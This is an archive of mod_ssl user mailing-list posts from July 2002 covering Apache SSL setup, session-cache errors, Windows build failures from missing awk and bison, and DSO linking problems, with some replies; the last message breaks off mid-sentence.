X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

ALthough if you just use the default installs the virtual host is already
setup

-----Original Message-----
From: Boyle Owen [mailto:Owen.Boyle@swx.com]
Sent: Friday, July 12, 2002 8:30 AM
To: modssl-users@modssl.org
Subject: RE: mod_ssl issue, https is not working


Have you created an SSL virtualhost?

As well as installing mod_ssl, you laso have to define a virtual host to
make use of it. Also, you have to tell the server to listen to port 443,
e.g.

Listen 192.168.0.1:443

  ...etc

Rgds,

owen Boyle

>-----Original Message-----
>From: Payal Suratwala [mailto:payal.suratwala@baker.edu]
>Sent: Donnerstag, 11. Juli 2002 22:55
>To: modssl-users@modssl.org
>Subject: mod_ssl issue, https is not working
>
>
>I have installed Apache-V2.39-compiled with mod_ssl module.  
>I have installed OpenSSL-V-0.9.6c and php4.2.2 on my server.  
>I have created the RSA certificate and Private key and moved 
>them in to the path described in the ssl.conf file.  When I 
>do ./apachectl startssl, the ssl starts but when I open 
>netscape to go to the https://servername, it prompts me that 
>I am about to go to the secure website,and I click okay and 
>then it tells me that the website is not found.  my 
>http://servername site works, but https://servername does 
>not, so what do I need to do? Why does the https now working? 
>I have looked every where to find information about this and 
>nothing has worked for me so far so, I would really 
>appriciate some help on this issue?  Thank You,
>
>PayalSuratwala
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 12 17:39:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA08800; Fri, 12 Jul 2002 17:38:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id RAA08769; Fri, 12 Jul 2002 17:37:38 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 92DCC4CE69A; Fri, 12 Jul 2002 17:37:37 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 65791285DC; Fri, 12 Jul 2002 17:36:49 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp02do.de.uu.net id PAA01268; Fri, 12 Jul 2002 15:23:05 +0200 (MET DST)
From: geo@de.uu.net
Received: from worf.de.uu.net (worf.de.uu.net [195.126.111.146])
	by smtp02do.de.uu.net (5.5.5/5.5.5) with ESMTP id PAA15496
	for ; Fri, 12 Jul 2002 15:23:03 +0200 (MET DST)
Message-Id: <200207121323.PAA15496@smtp02do.de.uu.net>
X-Mailer: exmh version 2.5 10/19/2001 with nmh-1.0.4
To: modssl-users@modssl.org
Subject: Problems using shmht Session Cache in Apache 2.0.39
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Date: Fri, 12 Jul 2002 15:23:03 +0200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: geo@de.uu.net
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I'm trying to use shmht Session Cache in Apache 2.0.39 on Solaris8. I 
get the followin g message in the error_log:
[Fri Jul 12 14:20:39 2002] [error] initialize MM bogus %pRMM 

My settings regarding session cache are as follows:
SSLSessionCache         shmht:/users/webs/apache/log/ssl_gcache_data(640
00)
SSLSessionCacheTimeout  300

I traced this down to the following snippet from /modules/ssl/ssl_scache
_shmht.c :

void ssl_scache_shmht_init(server_rec *s, apr_pool_t *p)
{
    SSLModConfigRec *mc = myModConfig(s);
    table_t *ta;
    int ta_errno;
    apr_size_t avail;
    int n;
    apr_status_t rv;

    /*
     * Create shared memory segment
     */
    if (mc->szSessionCacheDataFile == NULL) {
        ap_log_error(APLOG_MARK, APLOG_ERR, 0, s,
                     "SSLSessionCache required");
        ssl_die();
    }

    if ((rv = apr_shm_create(&(mc->pSessionCacheDataMM), 
                   mc->nSessionCacheDataSize, 
                   mc->szSessionCacheDataFile, mc->pPool)) != 
APR_SUCCESS) {
        ap_log_error(APLOG_MARK, APLOG_ERR, rv, s,
                     "Cannot allocate shared memory");
        ssl_die();
    }

    if ((rv = apr_rmm_init(&(mc->pSessionCacheDataRMM), NULL,
                   apr_shm_baseaddr_get(mc->pSessionCacheDataMM),
                   mc->nSessionCacheDataSize, mc->pPool)) != 
APR_SUCCESS) {
        ap_log_error(APLOG_MARK, APLOG_ERR, rv, s,
                     "Cannot initialize rmm");
        ssl_die();
    }
    ap_log_error(APLOG_MARK, APLOG_ERR, 0, s,
                 "initialize MM %p RMM %p",
                 mc->pSessionCacheDataMM, mc->pSessionCacheDataRMM);

The last line seems strange. Why is a error message printed if there is 
nothing wrong? Shouldn't APLOG_ERR be changed to APLOG_INFO ? And are 
the values to be printed correctly set?

BTW: shmcb works without problems.

Has anybody noticed the same problem?


Cheers
	Georg

UUNET - a WorldCom Company
UUNET Deutschland GmbH
Sebrathweg 20
44149 Dortmund
Germany

Tel. +49 231 972 1128
Fax. +49 231 972 1180
georg.oppenberg@de.uu.net
http://www.worldcom.com/de/


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 12 23:27:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA24236; Fri, 12 Jul 2002 23:26:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from priv-edtnes28.telusplanet.net id XAA24206; Fri, 12 Jul 2002 23:25:05 +0200 (MET DST)
Received: from billsoffice ([216.232.79.186])
          by priv-edtnes28.telusplanet.net
          (InterMail vM.5.01.04.05 201-253-122-122-105-20011231) with SMTP
          id <20020712212502.GLCJ25741.priv-edtnes28.telusplanet.net@billsoffice>
          for ; Fri, 12 Jul 2002 15:25:02 -0600
Message-ID: <002c01c229ea$954f1830$0d01a8c0@billsoffice>
From: "Bill Angus" 
To: 
Subject: trouble getting set up
Date: Fri, 12 Jul 2002 14:24:52 -0700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0029_01C229AF.E2F221D0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Bill Angus" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0029_01C229AF.E2F221D0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

I got the binaries distribution of Apache 2.0.39 for Windows 2000. =
Unfortunately I got it without MOD-SSL built, which I guess is the only =
way it comes.=20

The 2.0.39 version of Apache wouldn't install like version 2.0.36 did. I =
still haven't figured out how to install it but I assume RTFM and =
following the manual installation instructions will work. PLEASE somone =
let me know if this version can't be installed at all.=20

Next I downloaded the source files and went to build the apache and =
MOD_SSL source, because I figured that is something I would have to do =
to get MOD_SSL installed and working. Uckfay. I have Borland C++ =
Builder5 and Microsoft Visual Studio with MS-C++ 6 installed on my =
computer. Neither will allow me to build the project.=20

It seems like the platform of choice is Microsoft VC++, cause the =
Borland compiler switcher look different, so MSVC++ is the compiler I =
tried hardest to get to work. I keep getting errors like those appended =
below...

I am not a VC++ programmer by trade, so it goes without saying that I =
could not have written Apache from scratch in C. I haven't a clue why =
the file-set won't compile, but assume that it is undocumented compiler =
configuration requirements -- or files missing from source distribution. =


Any help greatly appreciated.=20

Bill Angus
http://www.psychtest.com

Trying to compile the base project fails as follows:

-------------------------------------------------------------------------=
-------

Deleting intermediate files and output files for project 'libapr - Win32 =
Debug'.
Deleting intermediate files and output files for project 'gen_uri_delims =
- Win32 Debug'.
Deleting intermediate files and output files for project 'xml - Win32 =
Debug'.
Deleting intermediate files and output files for project 'libaprutil - =
Win32 Debug'.
Build : warning : failed to (or don't know how to) build =
'C:\apachesource\httpd-2.0.39\srclib\apr-util\uri\gen_uri_delims.exe'
Deleting intermediate files and output files for project 'dftables - =
Win32 Debug'.
Deleting intermediate files and output files for project 'pcre - Win32 =
Debug'.
Deleting intermediate files and output files for project 'pcreposix - =
Win32 Debug'.
Deleting intermediate files and output files for project 'gen_test_char =
- Win32 Debug'.
Deleting intermediate files and output files for project 'libhttpd - =
Win32 Debug'.
Deleting intermediate files and output files for project 'Apache - Win32 =
Debug'.
--------------------Configuration: libapr - Win32 =
Debug--------------------
Creating apr.h from apr.hw
Creating Version Resource
'awk' is not recognized as an internal or external command,
operable program or batch file.
Error executing c:\winnt\system32\cmd.exe.

Apache.exe - 1 error(s), 0 warning(s)


-------------------------------------------------------------------------=
-------

Trying to compile MOD-SSL fails as follows:

Deleting intermediate files and output files for project 'mod_ssl - =
Win32 Debug'.
--------------------Configuration: mod_ssl - Win32 =
Debug--------------------
Generating ssl_expr_parse.c/.h from ssl_expr_parse.y
'bison' is not recognized as an internal or external command,
operable program or batch file.
The system cannot find the file specified.
Could Not Find C:\apachesource\httpd-2.0.39\modules\ssl\y.tab.c
The system cannot find the file specified.
Could Not Find C:\apachesource\httpd-2.0.39\modules\ssl\y.tab.h
Error executing c:\winnt\system32\cmd.exe.

mod_ssl.so - 1 error(s), 0 warning(s)

-------------------------------------------------------------------------=
-------


------=_NextPart_000_0029_01C229AF.E2F221D0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









I got the binaries distribution of =
Apache 2.0.39=20
for Windows 2000. Unfortunately I got it without MOD-SSL built, which I =
guess is=20
the only way it comes. 


 


The 2.0.39 version of =
Apache wouldn't install like version 2.0.36 did. I =
still=20
haven't figured out how to install it but I assume RTFM and =
following the=20
manual installation instructions will work. PLEASE somone let me know=20
if this version can't be installed at all. 


 


Next I downloaded the source files and =
went to=20
build the apache and MOD_SSL source, because I figured that is something =
I would=20
have to do to get MOD_SSL installed and working. Uckfay. I have Borland =
C++=20
Builder5 and Microsoft Visual Studio with MS-C++ 6 installed on my =
computer.=20
Neither will allow me to build the project. 


 


It seems like the platform of choice is =
Microsoft=20
VC++, cause the Borland compiler switcher look different, so MSVC++ =
is the=20
compiler I tried hardest to get to work. I keep getting errors like =
those=20
appended below...


 


I am not a VC++ programmer by trade, so =
it goes=20
without saying that I could not have written Apache from scratch in C. I =
haven't=20
a clue why the file-set won't compile, but assume that it is =
undocumented=20
compiler configuration requirements -- or files missing from source=20
distribution. 


 


Any help greatly appreciated. =



 


Bill Angus
http://www.psychtest.com



 


Trying to compile the base project =
fails as=20
follows:








Deleting intermediate files and output =
files for=20
project 'libapr - Win32 Debug'.
Deleting intermediate files and =
output files=20
for project 'gen_uri_delims - Win32 Debug'.
Deleting intermediate =
files and=20
output files for project 'xml - Win32 Debug'.
Deleting intermediate =
files and=20
output files for project 'libaprutil - Win32 Debug'.
Build : warning =
: failed=20
to (or don't know how to) build=20
'C:\apachesource\httpd-2.0.39\srclib\apr-util\uri\gen_uri_delims.exe'
=
Deleting=20
intermediate files and output files for project 'dftables - Win32=20
Debug'.
Deleting intermediate files and output files for project =
'pcre -=20
Win32 Debug'.
Deleting intermediate files and output files for =
project=20
'pcreposix - Win32 Debug'.
Deleting intermediate files and output =
files for=20
project 'gen_test_char - Win32 Debug'.
Deleting intermediate files =
and output=20
files for project 'libhttpd - Win32 Debug'.
Deleting intermediate =
files and=20
output files for project 'Apache - Win32=20
Debug'.
--------------------Configuration: libapr - Win32=20
Debug--------------------
Creating apr.h from apr.hw
Creating =
Version=20
Resource
'awk' is not recognized as an internal or external=20
command,
operable program or batch file.
Error executing=20
c:\winnt\system32\cmd.exe.


 


Apache.exe - 1 error(s), 0=20
warning(s)








Trying to compile MOD-SSL fails as=20
follows:


 


Deleting intermediate files and output =
files for=20
project 'mod_ssl - Win32 Debug'.
--------------------Configuration: =
mod_ssl -=20
Win32 Debug--------------------
Generating ssl_expr_parse.c/.h from=20
ssl_expr_parse.y
'bison' is not recognized as an internal or external =

command,
operable program or batch file.
The system cannot find =
the file=20
specified.
Could Not Find=20
C:\apachesource\httpd-2.0.39\modules\ssl\y.tab.c
The system cannot =
find the=20
file specified.
Could Not Find=20
C:\apachesource\httpd-2.0.39\modules\ssl\y.tab.h
Error executing=20
c:\winnt\system32\cmd.exe.


 


mod_ssl.so - 1 error(s), 0 =
warning(s)






------=_NextPart_000_0029_01C229AF.E2F221D0--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul 13 00:16:23 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA26106; Sat, 13 Jul 2002 00:15:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from inet.codep.cz id AAA26042; Sat, 13 Jul 2002 00:14:16 +0200 (MET DST)
Received: from jesip (ppp30.ul.worldonline.cz [212.11.96.32])
	(authenticated (0 bits))
	by inet.codep.cz (8.11.6/8.11.6) with ESMTP id g6CLE0x22865
	for ; Fri, 12 Jul 2002 23:14:01 +0200
From: =?iso-8859-2?Q?Jan_=A9kola?= 
To: 
Subject: RE: trouble getting set up
Date: Sat, 13 Jul 2002 00:13:54 +0200
Message-ID: <000501c229f1$6d044a10$0100000a@jesip>
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0006_01C22A02.308D1A10"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
In-Reply-To: <002c01c229ea$954f1830$0d01a8c0@billsoffice>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-2?Q?Jan_=A9kola?= 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0006_01C22A02.308D1A10
Content-Type: text/plain;
	charset="iso-8859-2"
Content-Transfer-Encoding: 7bit

Yes problem is that you need Win32 utilities ,awk' and ,bison'...
Download them somewhere put in directory in PATH and try compile
again...

 

Jan Skola

 

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Bill Angus
Sent: Friday, July 12, 2002 11:25 PM
To: modssl-users@modssl.org
Subject: trouble getting set up

 

I got the binaries distribution of Apache 2.0.39 for Windows 2000.
Unfortunately I got it without MOD-SSL built, which I guess is the only
way it comes. 

 

The 2.0.39 version of Apache wouldn't install like version 2.0.36 did. I
still haven't figured out how to install it but I assume RTFM and
following the manual installation instructions will work. PLEASE somone
let me know if this version can't be installed at all. 

 

Next I downloaded the source files and went to build the apache and
MOD_SSL source, because I figured that is something I would have to do
to get MOD_SSL installed and working. Uckfay. I have Borland C++
Builder5 and Microsoft Visual Studio with MS-C++ 6 installed on my
computer. Neither will allow me to build the project. 

 

It seems like the platform of choice is Microsoft VC++, cause the
Borland compiler switcher look different, so MSVC++ is the compiler I
tried hardest to get to work. I keep getting errors like those appended
below...

 

I am not a VC++ programmer by trade, so it goes without saying that I
could not have written Apache from scratch in C. I haven't a clue why
the file-set won't compile, but assume that it is undocumented compiler
configuration requirements -- or files missing from source distribution.


 

Any help greatly appreciated. 

 

Bill Angus
http://www.psychtest.com

 

Trying to compile the base project fails as follows:

  _____  

Deleting intermediate files and output files for project 'libapr - Win32
Debug'.
Deleting intermediate files and output files for project 'gen_uri_delims
- Win32 Debug'.
Deleting intermediate files and output files for project 'xml - Win32
Debug'.
Deleting intermediate files and output files for project 'libaprutil -
Win32 Debug'.
Build : warning : failed to (or don't know how to) build
'C:\apachesource\httpd-2.0.39\srclib\apr-util\uri\gen_uri_delims.exe'
Deleting intermediate files and output files for project 'dftables -
Win32 Debug'.
Deleting intermediate files and output files for project 'pcre - Win32
Debug'.
Deleting intermediate files and output files for project 'pcreposix -
Win32 Debug'.
Deleting intermediate files and output files for project 'gen_test_char
- Win32 Debug'.
Deleting intermediate files and output files for project 'libhttpd -
Win32 Debug'.
Deleting intermediate files and output files for project 'Apache - Win32
Debug'.
--------------------Configuration: libapr - Win32
Debug--------------------
Creating apr.h from apr.hw
Creating Version Resource
'awk' is not recognized as an internal or external command,
operable program or batch file.
Error executing c:\winnt\system32\cmd.exe.

 

Apache.exe - 1 error(s), 0 warning(s)

  _____  

Trying to compile MOD-SSL fails as follows:

 

Deleting intermediate files and output files for project 'mod_ssl -
Win32 Debug'.
--------------------Configuration: mod_ssl - Win32
Debug--------------------
Generating ssl_expr_parse.c/.h from ssl_expr_parse.y
'bison' is not recognized as an internal or external command,
operable program or batch file.
The system cannot find the file specified.
Could Not Find C:\apachesource\httpd-2.0.39\modules\ssl\y.tab.c
The system cannot find the file specified.
Could Not Find C:\apachesource\httpd-2.0.39\modules\ssl\y.tab.h
Error executing c:\winnt\system32\cmd.exe.

 

mod_ssl.so - 1 error(s), 0 warning(s)

  _____  


------=_NextPart_000_0006_01C22A02.308D1A10
Content-Type: text/html;
	charset="iso-8859-2"
Content-Transfer-Encoding: quoted-printable




















Yes problem is that you need =
Win32
utilities ‚awk‘ and ‚bison‘... Download them =
somewhere
put in directory in PATH and try compile again...



 



Jan Skola



 






-----Original Message-----

From:
owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] =
On Behalf Of Bill Angus

Sent: Friday, July 12, =
2002 11:25
PM

To: =
modssl-users@modssl.org

Subject: trouble getting =
set up



 






I got the binaries distribution of Apache 2.0.39 for =
Windows
2000. Unfortunately I got it without MOD-SSL built, which I guess is the =
only
way it comes. 









 









The 2.0.39 version of Apache wouldn't =
install like
version 2.0.36 did. I still haven't figured out how to install it but I =
assume
RTFM and following the manual installation instructions will work. =
PLEASE
somone let me know if this version can't be installed at all. =










 









Next I downloaded the source files and went to build =
the
apache and MOD_SSL source, because I figured that is something I would =
have to
do to get MOD_SSL installed and working. Uckfay. I have Borland C++ =
Builder5
and Microsoft Visual Studio with MS-C++ 6 installed on my computer. =
Neither
will allow me to build the project. 









 









It seems like the platform of choice is Microsoft =
VC++,
cause the Borland compiler switcher look different, so MSVC++ is =
the
compiler I tried hardest to get to work. I keep getting errors like =
those
appended below...









 









I am not a VC++ programmer by trade, so it goes =
without
saying that I could not have written Apache from scratch in C. I haven't =
a clue
why the file-set won't compile, but assume that it is undocumented =
compiler
configuration requirements -- or files missing from source distribution. =










 









Any help greatly appreciated. 









 














 









Trying to compile the base project fails as =
follows:



























Deleting intermediate files and output files for =
project
'libapr - Win32 Debug'.

Deleting intermediate files and output files for project 'gen_uri_delims =
-
Win32 Debug'.

Deleting intermediate files and output files for project 'xml - Win32 =
Debug'.

Deleting intermediate files and output files for project 'libaprutil - =
Win32
Debug'.

Build : warning : failed to (or don't know how to) build
'C:\apachesource\httpd-2.0.39\srclib\apr-util\uri\gen_uri_delims.exe'
=

Deleting intermediate files and output files for project 'dftables - =
Win32
Debug'.

Deleting intermediate files and output files for project 'pcre - Win32 =
Debug'.

Deleting intermediate files and output files for project 'pcreposix - =
Win32
Debug'.

Deleting intermediate files and output files for project 'gen_test_char =
- Win32
Debug'.

Deleting intermediate files and output files for project 'libhttpd - =
Win32
Debug'.

Deleting intermediate files and output files for project 'Apache - Win32
Debug'.

--------------------Configuration: libapr - Win32 =
Debug--------------------

Creating apr.h from apr.hw

Creating Version Resource

'awk' is not recognized as an internal or external command,

operable program or batch file.

Error executing c:\winnt\system32\cmd.exe.









 









Apache.exe - 1 error(s), 0 =
warning(s)
























Trying to compile MOD-SSL fails as =
follows:









 









Deleting intermediate files and output files for =
project 'mod_ssl
- Win32 Debug'.

--------------------Configuration: mod_ssl - Win32 =
Debug--------------------

Generating ssl_expr_parse.c/.h from ssl_expr_parse.y

'bison' is not recognized as an internal or external command,

operable program or batch file.

The system cannot find the file specified.

Could Not Find C:\apachesource\httpd-2.0.39\modules\ssl\y.tab.c

The system cannot find the file specified.

Could Not Find C:\apachesource\httpd-2.0.39\modules\ssl\y.tab.h

Error executing c:\winnt\system32\cmd.exe.









 









mod_ssl.so - 1 error(s), 0 =
warning(s)
























------=_NextPart_000_0006_01C22A02.308D1A10--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul 13 01:14:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA28147; Sat, 13 Jul 2002 01:13:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bistromath.cs.virginia.edu id BAA28131; Sat, 13 Jul 2002 01:12:38 +0200 (MET DST)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g6CN9npQ007958
	for ; Fri, 12 Jul 2002 19:09:49 -0400
Date: Fri, 12 Jul 2002 19:09:49 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: modssl-users@modssl.org
Subject: RE: trouble getting set up
In-Reply-To: <000501c229f1$6d044a10$0100000a@jesip>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=X-UNKNOWN
Content-Transfer-Encoding: 8BIT
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Sat, 13 Jul 2002, [iso-8859-2] Jan ©kola wrote:

> Yes problem is that you need Win32 utilities ,awk' and ,bison'...
> Download them somewhere put in directory in PATH and try compile
> again...

Right.  See also http://apr.apache.org/compiling_win32.html .

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul 13 04:41:26 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA12212; Sat, 13 Jul 2002 03:55:42 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id DAA12094; Sat, 13 Jul 2002 03:54:45 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id DEA094CE5F1; Sat, 13 Jul 2002 03:02:11 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 9E012285DC; Fri, 12 Jul 2002 22:04:19 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sfoexh01.yipes.com id UAA16410; Fri, 12 Jul 2002 20:15:35 +0200 (MET DST)
Received: by sfoexh01.yipes.com with Internet Mail Service (5.5.2653.19)
	id <3WD359GG>; Fri, 12 Jul 2002 11:12:08 -0700
Message-ID: <9C67F3C3FD4F3A43BB64A7C60871DC3F31CD5C@sfoexh01.yipes.com>
From: David Loesche 
To: "'modssl-users@modssl.org'" 
Subject: I am having a heck of a time - Please help.
Date: Fri, 12 Jul 2002 11:12:07 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David Loesche 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have poured through all the documentation I can find on enabling mod_ssl
with Apache 1.3.26 but keep coming up short.  If I static link the mod_ssl
it works fine but when I try to enable DSO and use it as a shared library I
keep getting ap_add_config_define : referenced symbol not found.  I have the
following config setup for the apache build:

#!/bin/ksh
SSL_BASE=/usr/local/ssl \
EAPI_MM=../mm-1.1.3 \
EAPI_MM_CORE_PATH=logs/httpd.mm \
LIBS=/usr/lib/libC.so.5 \
CFLAGS=-fPIC \
./configure	--prefix=/opt/apache \
		--enable-rule=EAPI \
		--enable-module=ssl \
		--enable-shared=ssl \
		--disable-rule=SSL_COMPAT \
		--enable-rule=SSL_SDBM \
		--enable-suexec \
		--suexec-caller=http

I have followed the instructions in the modssl install guide to patch
Apache.  Please verify the following build for mod_ssl:

./configure	--with-apache=../apache_1.3.26 \
		--with-ssl=/usr/local/ssl \
		--with-mm=../mm-1.1.3

If you can help (point me to some documentation) I would be very grateful...


David S. Loesche
david.loesche@yipes.com			Yipes Communications, Inc.
Main: 	(415) 901-2000 			114 Sansome Street, Suite 1045
Direct: 	(415) 901-2210			San Francisco, CA 94104
Fax: 	(415) 901-2201			http://www.yipes.com

Yipes is the defining provider of fully scalable bandwidth for businesses.
We offer fully managed high-speed Internet and Nationwide LAN-to-LAN
services at speeds ranging from 1 Mbps to 1 Gbps, in 1 Mbps increments. 

Yipes delivers this uniquely flexible service over the first nationwide
system of optical IP networks.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul 13 09:20:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA02560; Sat, 13 Jul 2002 09:19:07 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id JAA02550; Sat, 13 Jul 2002 09:18:48 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 9F2CE4CE748; Sat, 13 Jul 2002 09:18:47 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 584B8286B5; Sat, 13 Jul 2002 09:18:07 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id WAA21197; Fri, 12 Jul 2002 22:10:43 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Fri, 12 Jul 2002 13:09:37 -0700
Received: from 209.183.153.199 by lw3fd.law3.hotmail.msn.com with HTTP;
	Fri, 12 Jul 2002 20:09:36 GMT
X-Originating-IP: [209.183.153.199]
From: "liangbin li" 
To: modssl-users@modssl.org
Subject: How to access control cgi-bin
Date: Fri, 12 Jul 2002 20:09:36 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 12 Jul 2002 20:09:37.0224 (UTC) FILETIME=[0C1A0480:01C229E0]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "liangbin li" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I install apache httpd server with mod_ssl. I broswer a access controled 
html file and it calls a programm under cgi-bin directory.

I want to know how I can set up access control with in the cgi-bin's 
programm?

Thanks,
David



_________________________________________________________________
MSN Photos is the easiest way to share and print your photos: 
http://photos.msn.com/support/worldwide.aspx
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul 13 09:20:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA02575; Sat, 13 Jul 2002 09:19:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id JAA02547; Sat, 13 Jul 2002 09:18:48 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 6B8654CE618; Sat, 13 Jul 2002 09:18:47 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 3115D28707; Sat, 13 Jul 2002 09:18:13 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from umgah.mesas.com id AAA26497; Sat, 13 Jul 2002 00:28:28 +0200 (MET DST)
Received: from fxapps3.mesas.com (fxapps3.mesas.com [207.8.20.23])
	by umgah.mesas.com (8.11.4-jhemm/8.9.3) with ESMTP id g6CMSMV10858
	for ; Fri, 12 Jul 2002 17:28:22 -0500
Received: by fxapps3.mesas.com with Internet Mail Service (5.5.2653.19)
	id ; Fri, 12 Jul 2002 17:28:22 -0500
Message-ID: <5519ADC88B72AA469DBF02CA51211CE8026EF559@fxapps3.mesas.com>
From: John Milton 
To: "'modssl-users@modssl.org'" 
Subject: Distributed Session Cache
Date: Fri, 12 Jul 2002 17:28:20 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John Milton 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


We are in the process of switching from round-robin DNS
(clients tend to stay on one web server) to IBM Network
Dispatcher (client connections are spread across all web
servers). It looks like this is going to defeat the current
lift we're getting with the per-server session cache. I found
a blurb on ApacheWeek about a discussion at ApacheCon 2001:

   The future of mod_ssl was discussed including the work
   currently going on to port it to Apache 2.0, add LDAP
-> CRL handling, and a distributed session cache. mod_ssl
